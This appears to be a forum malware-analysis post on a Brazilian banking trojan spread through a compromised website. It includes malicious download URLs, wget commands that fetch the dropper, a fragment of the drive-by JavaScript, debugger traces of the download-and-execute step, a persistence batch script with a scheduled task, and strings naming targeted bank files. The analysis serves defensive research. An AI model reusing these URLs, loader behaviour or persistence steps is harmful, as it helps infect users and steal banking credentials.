Skip navigation.
Home

Brazilian Banker Trojan

|

Thanks to einstein for the submission

Found at

http://www.pupinini.com.br/aspnet_client/static.htm?Imagem=145879652148962

according to Einstein this site is spreading banker through JavaScript code include in HTML

45a31ae4473eaec28f7cd72453a207c7

Not packed.

If you hit it with IE it installs the malware. Wget with a user agent gave me a location to download the exe directly.

C:\>wget --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" http://www.pupinini.com.br/aspnet_client/static.htm?Imagem=145879652148962

00000000 00000000 0
00000040 00000040 0
000000A1 000000A1 0 ::internet::
000000CA 000000CA 0
00000114 00000114 0
0000011D 0000011D 0
00000125 00000125 0
0000094B 0000094B 0 %20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%20%20%20%20%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3E%5BLMURDOC%5D%20%7C%7C%20404%20%3C/title%3E%0D%0A%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A%3Ccenter%3E%3Cembed%20src%3D%22%22%20pluginspage%3D%22%22%20type%3D%22application/x-shockwave-flash%22%20width%3D%2250%22%20height%3D%2220%22%3E%20%20%3C/embed%3E%0D%0A%20%20%20%20%0D%0A%20%20%20%20%3C%21--%20%3Cscript%3Elocation.href%3D%27http%3A//google.com%27%3C/script%3E%20--%3E%0D%0A%20%20%20%20%3C/body%3E%0D%0A%0D%0A%20%20%20%20%3C/html%3E%0D%0A"
00000C0C 00000C0C 0 function SetNewWords()
00000C27 00000C27 0 var NewWords;
00000C3B 00000C3B 0 NewWords = unescape(Words);
00000C5D 00000C5D 0 document.write(NewWords);
00000C81 00000C81 0 SetNewWords();
00000C91 00000C91 0 // -->
00000C99 00000C99 0

C:\>wget --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" http://www.pupinini.com.br/aspnet_client/flash.exe

AntiVir 7.3.0.21 01.05.2007 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.30.2006 no virus found
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.06.2007 no virus found
BitDefender 7.2 01.06.2007 BehavesLike:Trojan.Downloader
CAT-QuickHeal 9.00 01.06.2007 no virus found
ClamAV devel-20060426 01.06.2007 no virus found
DrWeb 4.33 01.06.2007 no virus found
eSafe 7.0.14.0 01.05.2007 no virus found
eTrust-InoculateIT 23.73.107 01.06.2007 no virus found
eTrust-Vet 30.3.3307 01.06.2007 no virus found
Ewido 4.0 01.06.2007 no virus found
Fortinet 2.82.0.0 01.06.2007 suspicious
F-Prot 3.16f 01.05.2007 no virus found
F-Prot4 4.2.1.29 01.05.2007 no virus found
Ikarus T3.1.0.27 01.06.2007 no virus found
Kaspersky 4.0.2.24 01.06.2007 no virus found
McAfee 4933 01.05.2007 no virus found
Microsoft 1.1904 01.06.2007 no virus found
NOD32v2 1960 01.06.2007 probably a variant of Win32/TrojanDownloader.Banload.JM
Norman 5.80.02 12.31.2007 W32/Downloader
Panda 9.0.0.4 01.06.2007 Suspicious file
Prevx1 V2 01.07.2007 no virus found
Sophos 4.13.0 01.05.2007 no virus found
Sunbelt 2.2.907.0 01.05.2007 no virus found
TheHacker 6.0.3.143 01.05.2007 no virus found
UNA 1.83 01.06.2007 no virus found
VBA32 3.11.1 01.06.2007 no virus found
VirusBuster 4.3.19:9 01.06.2007 no virus found

Some events

0012FF58 004120BE /CALL to CreateEventA from flash.004120B9
0012FF5C 00000000 |pSecurity = NULL
0012FF60 FFFFFFFF |ManualReset = TRUE
0012FF64 00000000 |InitiallySignaled = FALSE
0012FF68 004120D4 \EventName = ""

0012E3A8 762C316F /CALL to CreateEventA from CRYPT32.762C3169
0012E3AC 0012E3DC |pSecurity = 0012E3DC
0012E3B0 00000001 |ManualReset = TRUE
0012E3B4 00000000 |InitiallySignaled = FALSE
0012E3B8 762DF298 \EventName = "Global\\crypt32LogoffEvent"

0012EBC8 |00153608 ASCII "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

An Exec

0012FF98 00412C53 /CALL to WinExec from flash.00412C4E
0012FF9C 00413844 |CmdLine = "C:\\WINDOWS\\system32\\wpabalnm.exe"
0012FFA0 00000000 \ShowState = SW_HIDE

I set a breakpoing on URLDownloadToFileA and got:

0012FF58 00412550 RETURN to flash.00412550 from
0012FF5C 00000000
0012FF60 00900A54 ASCII "http://www.attack.com.br/IMAGES/gol.jpg"
0012FF64 00412D1C ASCII "C:\\WINDOWS\\system32\\wpabalnm.exe"

CREATES FILES:

wpabalnm.exe 1502

IEXPLORE.EXE:1476 CREATE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\static[1].htm SUCCESS Options: Create Access: All
IEXPLORE.EXE:1476 CREATE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\YEP42GJS\flash[1].exe SUCCESS Options: Create Access: All
wpabalnm.exe:820 CREATE C:\WINDOWS\sysuphatch.exe SUCCESS Options: OverwriteIf Sequential Access: All
wpabalnm.exe:820 CREATE C:\start.bat SUCCESS Options: OverwriteIf Access: All
schtasks.exe:1892 CREATE C:\WINDOWS NAME COLLISION Options: Create Directory Access: All
schtasks.exe:1892 CREATE C:\WINDOWS\Tasks NAME COLLISION Options: Create Directory Access: All
schtasks.exe:1892 CREATE C:\WINDOWS\Tasks\startt.job SUCCESS Options: Create Sequential Access: All

contets of start.bat are:

@echo off
del c:\windows\downlo~1\gb*.*
del c:\windows\downlo~1\*.g??
del c:\windows\downlo~1\g*.*

creates a scheduled task called starrt that is set to run at system startup and runs start.bat

2299 4:22:21 PM IEXPLORE.EXE:1476 WRITE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\static[1].htm SUCCESS Offset: 2564 Length: 670
2420 4:22:25 PM IEXPLORE.EXE:1476 WRITE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\YEP42GJS\flash[1].exe SUCCESS Offset: 0 Length: 704
2663 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 0 Length: 65536
2664 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 65536 Length: 28672
2665 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 0 Length: 65536
2666 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 65536 Length: 28672

2936 4:23:05 PM wpabalnm.exe:820 WRITE C:\WINDOWS\sysuphatch.ini SUCCESS Offset: 0 Length: 10
2947 4:23:05 PM wpabalnm.exe:820 CREATE C:\WINDOWS\sysuphatch.exe SUCCESS Options: OverwriteIf Sequential Access: All

2995 4:23:08 PM wpabalnm.exe:820 CREATE C:\start.bat SUCCESS Options: OverwriteIf Access: All
3001 4:23:08 PM wpabalnm.exe:820 WRITE C:\start.bat SUCCESS Offset: 0 Length: 103
3141 4:23:09 PM schtasks.exe:1892 WRITE C:\WINDOWS\Tasks\startt.job SUCCESS Offset: 0 Length: 192

At some point it must create wpabalnum.exe but i dont see where yet.

wpabalnm.exe is packed with pecompact 2

STRINGS

00000050 00400050 0 This program must be run under Win32
00000270 00400270 0 .idata
000002C0 004002C0 0 .rdata
000002E7 004002E7 0 P.reloc
0000030F 0040030F 0 P.rsrc
00000406 00401006 0 StringX
00000459 00401059 0 TObjectd
00000466 00401066 0 TObjectX
00000478 00401078 0 System
00000486 00401086 0 IInterface
000004A6 004010A6 0 System
0000054D 0040114D 0 TInterfacedObject
000021D0 00402DD0 0 SOFTWARE\Borland\Delphi\RTL
000021EC 00402DEC 0 FPUMaskValue
00003DEC 004049EC 0 kernel32.dll
00003DFC 004049FC 0 GetLongPathNameA
00004040 00404C40 0 Software\Borland\Locales
0000405C 00404C5C 0 Software\Borland\Delphi\Locales
00004EF6 00405AF6 0 ExceptionL[@
00004F4D 00405B4D 0 EHeapException
00004FA9 00405BA9 0 EOutOfMemory
00005005 00405C05 0 EInOutError\\@
0000505C 00405C5C 0 EExternal
000050B5 00405CB5 0 EExternalException
00005114 00405D14 0 EIntError
0000516D 00405D6D 0 EDivByZero
000051C5 00405DC5 0 ERangeError
0000521D 00405E1D 0 EIntOverflow
00005279 00405E79 0 EMathError
000052D1 00405ED1 0 EInvalidOp
00005329 00405F29 0 EZeroDivide
00005380 00405F80 0 EOverflow
000053D9 00405FD9 0 EUnderflow
00005431 00406031 0 EInvalidPointer
0000548D 0040608D 0 EInvalidCast
000054E9 004060E9 0 EConvertError
00005545 00406145 0 EAccessViolation
000055A5 004061A5 0 EPrivilege
000055FD 004061FD 0 EStackOverflow
00005658 00406258 0 EControlC
000056B1 004062B1 0 EVariantError
0000570D 0040630D 0 EAssertionFailed
0000576D 0040636D 0 EAbstractError
000057C9 004063C9 0 EIntfCastError
00005825 00406425 0 EOSError
0000587D 0040647D 0 ESafecallException
000058AA 004064AA 0 SysUtils
000058CE 004064CE 0 SysUtils
00005931 00406531 0 TThreadLocalCounter
00005A0C 0040660C 0 $TMultiReadExclusiveWriteSynchronizer
00005EA4 00406AA4 0 False
00006A44 00407644 0 INFNAN
00009259 00409E59 0 TErrorRec
000092DA 00409EDA 0 TExceptRec
0000A438 0040B038 0 kernel32.dll
0000A448 0040B048 0 GetDiskFreeSpaceExA
0000AF60 0040BB60 0 kernel32.dll
0000AF70 0040BB70 0 CreateToolhelp32Snapshot
0000AF8C 0040BB8C 0 Heap32ListFirst
0000AF9C 0040BB9C 0 Heap32ListNext
0000AFAC 0040BBAC 0 Heap32First
0000AFB8 0040BBB8 0 Heap32Next
0000AFC4 0040BBC4 0 Toolhelp32ReadProcessMemory
0000AFE0 0040BBE0 0 Process32First
0000AFF0 0040BBF0 0 Process32Next
0000B000 0040BC00 0 Process32FirstW
0000B010 0040BC10 0 Process32NextW
0000B020 0040BC20 0 Thread32First
0000B030 0040BC30 0 Thread32Next
0000B040 0040BC40 0 Module32First
0000B050 0040BC50 0 Module32Next
0000B060 0040BC60 0 Module32FirstW
0000B070 0040BC70 0 Module32NextW
0000B7C0 0040C3C0 0 oleaut32.dll
0000B7D0 0040C3D0 0 VariantChangeTypeEx
0000B7E4 0040C3E4 0 VarNeg
0000B7EC 0040C3EC 0 VarNot
0000B7F4 0040C3F4 0 VarAdd
0000B7FC 0040C3FC 0 VarSub
0000B804 0040C404 0 VarMul
0000B80C 0040C40C 0 VarDiv
0000B814 0040C414 0 VarIdiv
0000B81C 0040C41C 0 VarMod
0000B824 0040C424 0 VarAnd
0000B82C 0040C42C 0 VarOr
0000B834 0040C434 0 VarXor
0000B83C 0040C43C 0 VarCmp
0000B844 0040C444 0 VarI4FromStr
0000B854 0040C454 0 VarR4FromStr
0000B864 0040C464 0 VarR8FromStr
0000B874 0040C474 0 VarDateFromStr
0000B884 0040C484 0 VarCyFromStr
0000B894 0040C494 0 VarBoolFromStr
0000B8A4 0040C4A4 0 VarBstrFromCy
0000B8B4 0040C4B4 0 VarBstrFromDate
0000B8C4 0040C4C4 0 VarBstrFromBool
0000B9ED 0040C5ED 0 TCustomVariantType
0000BA06 0040C606 0 TCustomVariantType
0000BA23 0040C623 0 Variants
0000BA7D 0040C67D 0 EVariantInvalidOpError
0000BAE1 0040C6E1 0 EVariantTypeCastError
0000BB45 0040C745 0 EVariantOverflowError
0000BBA9 0040C7A9 0 EVariantInvalidArgError
0000BC0D 0040C80D 0 EVariantBadVarTypeErrorp
0000BC71 0040C871 0 EVariantBadIndexError
0000BCD5 0040C8D5 0 EVariantArrayLockedError
0000BD3D 0040C93D 0 EVariantArrayCreateError
0000BDA5 0040C9A5 0 EVariantNotImplError
0000BE09 0040CA09 0 EVariantOutOfMemoryError
0000BE71 0040CA71 0 EVariantUnexpectedError
0000BED5 0040CAD5 0 EVariantDispatchError
0000C178 0040CD78 0 t?Htb
0000CA6D 0040D66D 0 QQQQSV
0000D994 0040E594 0 Empty
0000D9B4 0040E5B4 0 Smallint
0000D9C8 0040E5C8 0 Integer
0000D9D8 0040E5D8 0 Single
0000D9E8 0040E5E8 0 Double
0000D9F8 0040E5F8 0 Currency
0000DA1C 0040E61C 0 OleStr
0000DA2C 0040E62C 0 Dispatch
0000DA40 0040E640 0 Error
0000DA50 0040E650 0 Boolean
0000DA60 0040E660 0 Variant
0000DA70 0040E670 0 Unknown
0000DA80 0040E680 0 Decimal
0000DA9C 0040E69C 0 ShortInt
0000DAD0 0040E6D0 0 LongWord
0000DAE4 0040E6E4 0 Int64
0000DC28 0040E828 0 String
0000DC44 0040E844 0 Array
0000DC54 0040E854 0 ByRef
0000DC9A 0040E89A 0 Variants
0000DDE0 0040E9E0 0 SVWUQ
0000DF77 0040EB77 0 t~hpXA
0000E1C4 0040EDC4 0 False
0000E28D 0040EE8D 0 EStreamError
0000E2E9 0040EEE9 0 EFileStreamError
0000E349 0040EF49 0 EFCreateError
0000E3A5 0040EFA5 0 EFOpenError
0000E3FD 0040EFFD 0 EFilerErrorT
0000E455 0040F055 0 EReadError
0000E4AD 0040F0AD 0 EWriteError
0000E505 0040F105 0 EListError
0000E55D 0040F15D 0 EStringListError
0000E5CD 0040F1CD 0 TList
0000E621 0040F221 0 TThreadListx
0000E693 0040F293 0 TPersistent
0000E6A6 0040F2A6 0 TPersistentx
0000E6BC 0040F2BC 0 Classes
0000E6CE 0040F2CE 0 IStringsAdapter
0000E6F3 0040F2F3 0 Classes
0000E7DF 0040F3DF 0 TStrings
0000E7EE 0040F3EE 0 TStringsL
0000E801 0040F401 0 Classes
0000E812 0040F412 0 TStringItem
0000E915 0040F515 0 TStringList$
0000E926 0040F526 0 TStringList|
0000E93C 0040F53C 0 Classes
0000E9B1 0040F5B1 0 TStream
0000EA21 0040F621 0 THandleStream
0000EA99 0040F699 0 TFileStream
0000EAF0 0040F6F0 0 TRegGroup
0000EB49 0040F749 0 TRegGroups
0000F5C8 004101C8 0 Php A
0000F5FC 004101FC 0 Strings
00012078 00412C78 0 http://www.attack.com.br/IMAGES/gol.jpg
000120A8 00412CA8 0 http://www.calixto.adv.br/aspnet_client/aspweb.dll
000120E4 00412CE4 0 http://www.calixto.adv.br/imagens/foto_12.jpg
0001211C 00412D1C 0 C:\WINDOWS\system32\wpabalnm.exe
00012148 00412D48 0 wupdmgr.exe
0001215C 00412D5C 0 svchosts.exe
00012174 00412D74 0 system32dll.exe
0001218C 00412D8C 0 svchosts.scr
000121A4 00412DA4 0 msconf.exe
000121B8 00412DB8 0 wmplayer.exe
000121D0 00412DD0 0 help.scr
000121E4 00412DE4 0 system32.exe
000121FC 00412DFC 0 WineWork.exe
00012214 00412E14 0 lsass32.exe
00012228 00412E28 0 netsh.exe
0001223C 00412E3C 0 csrs.scr
00012250 00412E50 0 wsass32.exe
00012264 00412E64 0 Microsoft.exe
0001227C 00412E7C 0 install.exe
00012290 00412E90 0 amsn.exe
000122A4 00412EA4 0 servico.exe
000122B8 00412EB8 0 hpztsb02.exe
000122D0 00412ED0 0 expert.exe
000122E4 00412EE4 0 ImgPaint.exe
000122FC 00412EFC 0 winsys.exe
00012310 00412F10 0 nvcpll.exe
00012324 00412F24 0 regserver.exe
0001233C 00412F3C 0 wgalogon.exe
00012354 00412F54 0 WinNT.exe
00012368 00412F68 0 C:\WINDOWS\wmplayer.exe
00012388 00412F88 0 c:\windows\wmplayer.exe
000123A8 00412FA8 0 C:\WINDOWS\help.scr
000123C4 00412FC4 0 c:\windows\help.scr
000123E0 00412FE0 0 C:\WINDOWS\system32.exe
00012400 00413000 0 c:\windows\system32.exe
00012420 00413020 0 C:\WINDOWS\MEDIA\WineWork.exe
00012448 00413048 0 c:\windows\MEDIA\WineWork.exe
00012470 00413070 0 C:\WINDOWS\lsass32.exe
00012490 00413090 0 c:\windows\lsass32.exe
000124B0 004130B0 0 C:\WINDOWS\netsh.exe
000124D0 004130D0 0 c:\windows\netsh.exe
000124F0 004130F0 0 C:\WINDOWS\csrs.scr
0001250C 0041310C 0 c:\windows\csrs.scr
00012528 00413128 0 C:\WINDOWS\wsass32.exe
00012548 00413148 0 c:\windows\wsass32.exe
00012568 00413168 0 C:\WINDOWS\Microsoft.exe
0001258C 0041318C 0 c:\windows\Microsoft.exe
000125B0 004131B0 0 C:\WINDOWS\install.exe
000125D0 004131D0 0 c:\windows\install.exe
000125F0 004131F0 0 C:\WINDOWS\Config\amsn.exe
00012614 00413214 0 c:\windows\Config\amsn.exe
00012638 00413238 0 C:\WINDOWS\servico.exe
00012658 00413258 0 c:\windows\servico.exe
00012678 00413278 0 C:\WINDOWS\hpztsb02.exe
00012698 00413298 0 c:\windows\hpztsb02.exe
000126B8 004132B8 0 C:\WINDOWS\expert.exe
000126D8 004132D8 0 c:\windows\expert.exe
000126F8 004132F8 0 C:\WINDOWS\ImgPaint.exe
00012718 00413318 0 c:\windows\ImgPaint.exe
00012738 00413338 0 C:\WINDOWS\winsys.exe
00012758 00413358 0 c:\windows\winsys.exe
00012778 00413378 0 C:\WINDOWS\nvcpll.exe
00012798 00413398 0 c:\windows\nvcpll.exe
000127B8 004133B8 0 C:\WINDOWS\svchost.exe
000127D8 004133D8 0 c:\windows\svchost.exe
000127F8 004133F8 0 C:\lsass32.exe
00012810 00413410 0 C:\WINDOWS\regserver.exe
00012834 00413434 0 c:\windows\regserver.exe
00012858 00413458 0 C:\WINDOWS\wgalogon.exe
00012878 00413478 0 c:\windows\wgalogon.exe
00012898 00413498 0 C:\WINDOWS\Downloaded Program Files\GBPLUGINBB.INF
000128D4 004134D4 0 C:\WINDOWS\Downloaded Program Files\BB.GPC
00012908 00413508 0 c:\windows\SSH2.DLL
00012924 00413524 0 c:\windows\SSH2.dll
00012940 00413540 0 c:\windows\SCPSEG.DLL
00012960 00413560 0 c:\windows\SCPNESIG.BIN
00012980 00413580 0 c:\windows\SCPMNE.DLL
000129A0 004135A0 0 c:\windows\SCPNEWCT.DLL
000129C0 004135C0 0 c:\windows\SCPNEURL.DLL
000129E0 004135E0 0 c:\windows\SCPNEDNS.DLL
00012A00 00413600 0 C:\WINDOWS\Downloaded Program Files\SCPSEG.INF
00012A38 00413638 0 c:\windows\scpMIB.dll
00012A58 00413658 0 c:\windows\scpibsig.bin
00012A78 00413678 0 c:\windows\scpibwct.bin
00012A98 00413698 0 c:\windows\sshib.dll
00012AB8 004136B8 0 c:\windows\scpibdns.bin
00012AD8 004136D8 0 c:\windows\scpiburl.bin
00012AF8 004136F8 0 c:\windows\scpsssh2.inf
00012B18 00413718 0 c:\windows\system32dll.exe
00012B3C 0041373C 0 c:\windows\wupdmgr.exe
00012B5C 0041375C 0 c:\windows\svchosts.exe
00012B7C 0041377C 0 c:\windows\svchosts.scr
00012B9C 0041379C 0 c:\windows\svchost.scr
00012BBC 004137BC 0 c:\windows\msconf.exe
00012BDC 004137DC 0 c:\windows\system\svchosts.exe
00012C04 00413804 0 c:\windows\system\svchosts.scr
00012C2C 0041382C 0 c:\windows\WinNT.exe
00012C44 00413844 0 C:\WINDOWS\system32\wpabalnm.exe
00012E64 00414064 0 Error
00012E6C 0041406C 0 Runtime error at 00000000
00012E8C 0041408C 0 0123456789ABCDEF
00012F7C 0041417C 0 %.*d0Y@
000136B0 004162B0 0 kernel32.dll
000136C0 004162C0 0 DeleteCriticalSection
000136D8 004162D8 0 LeaveCriticalSection
000136F0 004162F0 0 EnterCriticalSection
00013708 00416308 0 InitializeCriticalSection
00013724 00416324 0 VirtualFree
00013732 00416332 0 VirtualAlloc
00013742 00416342 0 LocalFree
0001374E 0041634E 0 LocalAlloc
0001375C 0041635C 0 GetTickCount
0001376C 0041636C 0 QueryPerformanceCounter
00013786 00416386 0 GetVersion
00013794 00416394 0 GetCurrentThreadId
000137AA 004163AA 0 InterlockedDecrement
000137C2 004163C2 0 InterlockedIncrement
000137DA 004163DA 0 VirtualQuery
000137EA 004163EA 0 WideCharToMultiByte
00013800 00416400 0 MultiByteToWideChar
00013816 00416416 0 lstrlenA
00013822 00416422 0 lstrcpynA
0001382E 0041642E 0 LoadLibraryExA
00013840 00416440 0 GetThreadLocale
00013852 00416452 0 GetStartupInfoA
00013864 00416464 0 GetProcAddress
00013876 00416476 0 GetModuleHandleA
0001388A 0041648A 0 GetModuleFileNameA
000138A0 004164A0 0 GetLocaleInfoA
000138B2 004164B2 0 GetCommandLineA
000138C4 004164C4 0 FreeLibrary
000138D2 004164D2 0 FindFirstFileA
000138E4 004164E4 0 FindClose
000138F0 004164F0 0 ExitProcess
000138FE 004164FE 0 WriteFile
0001390A 0041650A 0 UnhandledExceptionFilter
00013926 00416526 0 RtlUnwind
00013932 00416532 0 RaiseException
00013944 00416544 0 GetStdHandle
00013952 00416552 0 user32.dll
00013960 00416560 0 GetKeyboardType
00013972 00416572 0 LoadStringA
00013980 00416580 0 MessageBoxA
0001398E 0041658E 0 CharNextA
00013998 00416598 0 advapi32.dll
000139A8 004165A8 0 RegQueryValueExA
000139BC 004165BC 0 RegOpenKeyExA
000139CC 004165CC 0 RegCloseKey
000139D8 004165D8 0 oleaut32.dll
000139E8 004165E8 0 SysFreeString
000139F8 004165F8 0 SysReAllocStringLen
00013A0E 0041660E 0 SysAllocStringLen
00013A20 00416620 0 kernel32.dll
00013A30 00416630 0 TlsSetValue
00013A3E 0041663E 0 TlsGetValue
00013A4C 0041664C 0 LocalAlloc
00013A5A 0041665A 0 GetModuleHandleA
00013A6C 0041666C 0 kernel32.dll
00013A7C 0041667C 0 WriteFile
00013A88 00416688 0 WinExec
00013A92 00416692 0 WaitForSingleObject
00013AA8 004166A8 0 VirtualQuery
00013AB8 004166B8 0 TerminateProcess
00013ACC 004166CC 0 SetFilePointer
00013ADE 004166DE 0 SetEvent
00013AEA 004166EA 0 SetEndOfFile
00013AFA 004166FA 0 ResetEvent
00013B08 00416708 0 ReadFile
00013B14 00416714 0 OpenProcess
00013B22 00416722 0 LeaveCriticalSection
00013B3A 0041673A 0 InitializeCriticalSection
00013B56 00416756 0 GetVersionExA
00013B66 00416766 0 GetThreadLocale
00013B78 00416778 0 GetStringTypeExA
00013B8C 0041678C 0 GetStdHandle
00013B9C 0041679C 0 GetProcAddress
00013BAE 004167AE 0 GetModuleHandleA
00013BC2 004167C2 0 GetModuleFileNameA
00013BD8 004167D8 0 GetLocaleInfoA
00013BEA 004167EA 0 GetLocalTime
00013BFA 004167FA 0 GetLastError
00013C0A 0041680A 0 GetFullPathNameA
00013C1E 0041681E 0 GetDiskFreeSpaceA
00013C32 00416832 0 GetDateFormatA
00013C44 00416844 0 GetCurrentThreadId
00013C5A 0041685A 0 GetCPInfo
00013C66 00416866 0 GetACP
00013C70 00416870 0 FormatMessageA
00013C82 00416882 0 FindFirstFileA
00013C94 00416894 0 FindClose
00013CA0 004168A0 0 FileTimeToLocalFileTime
00013CBA 004168BA 0 FileTimeToDosDateTime
00013CD2 004168D2 0 EnumCalendarInfoA
00013CE6 004168E6 0 EnterCriticalSection
00013CFE 004168FE 0 DeleteFileA
00013D0C 0041690C 0 DeleteCriticalSection
00013D24 00416924 0 CreateFileA
00013D32 00416932 0 CreateEventA
00013D42 00416942 0 CompareStringA
00013D54 00416954 0 CloseHandle
00013D60 00416960 0 user32.dll
00013D6E 0041696E 0 MessageBoxA
00013D7C 0041697C 0 LoadStringA
00013D8A 0041698A 0 GetSystemMetrics
00013D9E 0041699E 0 CharNextA
00013DAA 004169AA 0 CharToOemA
00013DB6 004169B6 0 kernel32.dll
00013DC6 004169C6 0 Sleep
00013DCC 004169CC 0 URLMON.DLL
00013DDA 004169DA 0 URLDownloadToFileA
00013DEE 004169EE 0 oleaut32.dll
00013DFE 004169FE 0 SafeArrayPtrOfIndex
00013E14 00416A14 0 SafeArrayGetUBound
00013E2A 00416A2A 0 SafeArrayGetLBound
00013E40 00416A40 0 SafeArrayCreate
00013E52 00416A52 0 VariantChangeType
00013E66 00416A66 0 VariantCopy
00013E74 00416A74 0 VariantClear
00013E84 00416A84 0 VariantInit
00016DEE 0041C1EE 0 batepapo
00016DF9 0041C1F9 0 IniFiles
00016E03 0041C203 0 "RTLConsts
00016E10 0041C210 0 System
00016E19 0041C219 0 SysInit
00016E22 0041C222 0 KWindows
00016E2C 0041C22C 0 UTypes
00016E35 0041C235 0 SysUtils
00016E40 0041C240 0 SysConst
00016E4B 0041C24B 0 Classes
00016E54 0041C254 0 3Messages
00016E5F 0041C25F 0 CVariants
00016E6A 0041C26A 0 $VarUtils
00016E75 0041C275 0 QTypInfo
00016E7F 0041C27F 0 sActiveX
00016E89 0041C289 0 8Registry
00016E95 0041C295 0 TlHelp32
00016EA0 0041C2A0 0 UrlMon
00015E00 0041B200 0 PACKAGEINFO
00015F30 0041B330 0 Stream write error
000160EE 0041B4EE 0 Invalid property value List capacity out of bounds (%d)
00016772 0041BB72 0 %s (%s, line %d)
00016A66 0041BE66 0 Write$Error creating variant or safe array)Variant or safe array index out of bounds
00016D80 0041C180 0 Floating point underflow
00015E18 0041B218 65424 List count out of bounds (%d)
00015E54 0041B254 65425 List index out of bounds (%d)
00015E90 0041B290 65426 Stream read error
00015EB4 0041B2B4 65427 %s.Seek not implemented
00015EE4 0041B2E4 65428 Operation not allowed on sorted list
00015F2E 0041B32E 65429 Stream write error
00015F8C 0041B38C 65443 Sunday
00015F9A 0041B39A 65444 Monday
00015FA8 0041B3A8 65445 Tuesday
00015FB8 0041B3B8 65446 Wednesday
00015FCC 0041B3CC 65447 Thursday
00015FDE 0041B3DE 65448 Friday
00015FEC 0041B3EC 65449 Saturday
00015FFE 0041B3FE 65450 Cannot assign a %s to a %s
00016034 0041B434 65451 String list does not allow duplicates
00016080 0041B480 65452 Cannot create file "%s". %s
000160B8 0041B4B8 65453 Cannot open file "%s". %s
000160EC 0041B4EC 65454 Invalid property value
0001611A 0041B51A 65455 List capacity out of bounds (%d)
0001617C 0041B57C 65456 January
0001618C 0041B58C 65457 February
0001619E 0041B59E 65458 March
000161AA 0041B5AA 65459 April
000161D2 0041B5D2 65463 August
000161E0 0041B5E0 65464 September
000161F4 0041B5F4 65465 October
00016204 0041B604 65466 November
00016216 0041B616 65467 December
00016268 0041B668 65472 Abstract Error
00016286 0041B686 65473 Access violation at address %p in module '%s'. %s of address %p
00016340 0041B740 65475 A call to an OS function failed
00016400 0041B800 65488 Variant or safe array is locked
00016440 0041B840 65489 Invalid variant type conversion
00016480 0041B880 65490 Invalid variant operation
00016500 0041B900 65492 Could not convert variant of type (%s) into type (%s)
0001656C 0041B96C 65493 Overflow while converting variant of type (%s) into type (%s)
000165E8 0041B9E8 65494 Variant overflow
0001660A 0041BA0A 65495 Invalid argument
0001662C 0041BA2C 65496 Invalid variant type
00016656 0041BA56 65497 Operation not supported
00016686 0041BA86 65498 Unexpected variant error
000166B8 0041BAB8 65499 External exception %x
000166E4 0041BAE4 65500 Assertion failed
00016706 0041BB06 65501 Interface not supported
00016736 0041BB36 65502 Exception in safecall method
00016770 0041BB70 65503 %s (%s, line %d)
000167B4 0041BBB4 65504 Invalid pointer operation
000167E8 0041BBE8 65505 Invalid class typecast
00016816 0041BC16 65506 Access violation at address %p. %s of address %p
00016878 0041BC78 65507 Access violation
0001689A 0041BC9A 65508 Stack overflow
000168B8 0041BCB8 65509 Control-C hit
000168D4 0041BCD4 65510 Privileged instruction
00016954 0041BD54 65512 Application Error
00016978 0041BD78 65513 Format '%s' invalid or incompatible with argument
000169DC 0041BDDC 65514 No argument for format '%s'
00016A14 0041BE14 65515 Variant method calls not supported
00016A64 0041BE64 65517 Write
00016A70 0041BE70 65518 Error creating variant or safe array
00016ABA 0041BEBA 65519 Variant or safe array index out of bounds
00016B30 0041BF30 65520 Out of memory
00016B4C 0041BF4C 65521 I/O error %d
00016B66 0041BF66 65522 File not found
00016B84 0041BF84 65523 Invalid filename
00016BA6 0041BFA6 65524 Too many open files
00016BCE 0041BFCE 65525 File access denied
00016BF4 0041BFF4 65526 Read beyond end of file
00016C24 0041C024 65527 Disk full
00016C38 0041C038 65528 Invalid numeric input
00016C64 0041C064 65529 Division by zero
00016C86 0041C086 65530 Range check error
00016CAA 0041C0AA 65531 Integer overflow
00016CCC 0041C0CC 65532 Invalid floating point operation
00016D0E 0041C10E 65533 Floating point division by zero
00016D4E 0041C14E 65534 Floating point overflow
00016D7E 0041C17E 65535 Floating point underflow

[At some point it must

>At some point it must create wpabalnum.exe but i dont see where yet
It doesn't use standard CreateFileA function, it uses CreateFileW passing through wrapped function CreateFileWrapW because the filename is in unicode format.

ah cool

that makes sense. Thanks for the input!

V.

more

#####################################################
It creates wpabalnm.exe by downloading:

GET /IMAGES/gol.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.attack.com.br
Connection: Keep-Alive

gol.jpg is actually wpabalnm.exe

C:\>md5sum gol.jpg
2b5f69da967ea1ba108a7e187701028d *gol.jpg

C:\>md5sum wpabalnm.exe
2b5f69da967ea1ba108a7e187701028d *wpabalnm.exe

wpabalnm.exe is packed with pecompact 2

There are tons of strings but some interesting ones:

000B6964 004B6964 0 http://www.uonet.com.br/form1.asp

when you go to that url with firefox you get a blank page but wget retrieves a weird file:

00000000 00000000 0
00000007 00000007 0
0000000E 0000000E 0
00000058 00000058 0
000000AF 000000AF 0
00000107 00000107 0
0000016A 0000016A 0
000001BC 000001BC 0
0000020D 0000020D 0
00000276 00000276 0
000002DF 000002DF 0
00000346 00000346 0
